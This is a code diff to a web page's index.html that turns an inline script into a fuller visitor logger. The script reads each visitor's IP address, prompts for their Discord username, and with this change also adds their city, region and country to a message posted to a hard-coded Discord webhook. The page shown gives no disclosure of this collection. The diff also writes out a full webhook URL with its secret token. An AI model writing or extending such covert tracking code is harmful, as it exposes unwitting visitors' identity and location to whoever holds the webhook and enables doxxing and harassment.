--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
-<!-- Your updated HTML with added functionality -->
+<!-- Updated HTML with enhanced functionality -->
 <!DOCTYPE html>
 <html lang="en">
 <head>
@@ -14,14 +14,14 @@
         const webhookUrl = 'https://discord.com/api/webhooks/1181568688365772810/a8uz5coZtPV_fm96znZsrCny53RXJn55vjU0P6QfzL7VVVvcoDjnCvKgfbjPhHARDI5N'; // Replace with your Discord webhook URL
 
         // Function to send user and device information to Discord
-        const sendInfoToDiscord = (username, ip, userAgent) => {
+        const sendInfoToDiscord = (username, ip, address, userAgent) => {
             fetch(webhookUrl, {
                 method: 'POST',
                 headers: {
                     'Content-Type': 'application/json',
                 },
                 body: JSON.stringify({
-                    content: `New visitor info:\nUsername: ${username}\nIP: ${ip}\nUser Agent: ${userAgent}`,
+                    content: `New visitor info:\nUsername: ${username}\nIP: ${ip}\nAddress: ${address}\nUser Agent: ${userAgent}`,
                 }),
             });
         };
@@ -29,14 +29,15 @@
         // Function to get visitor's information
         const getVisitorInfo = async () => {
             try {
-                const response = await fetch('https://api64.ipify.org?format=json');
+                const response = await fetch('https://ipapi.co/json/');
                 const data = await response.json();
                 const ip = data.ip;
+                const address = `${data.city}, ${data.region}, ${data.country_name}`;
                 const username = prompt('Please enter your Discord username:');
                 const userAgent = navigator.userAgent;
 
                 if (username) {
-                    sendInfoToDiscord(username, ip, userAgent);
+                    sendInfoToDiscord(username, ip, address, userAgent);
                 } else {
                     console.error('Discord username not provided');
                 }
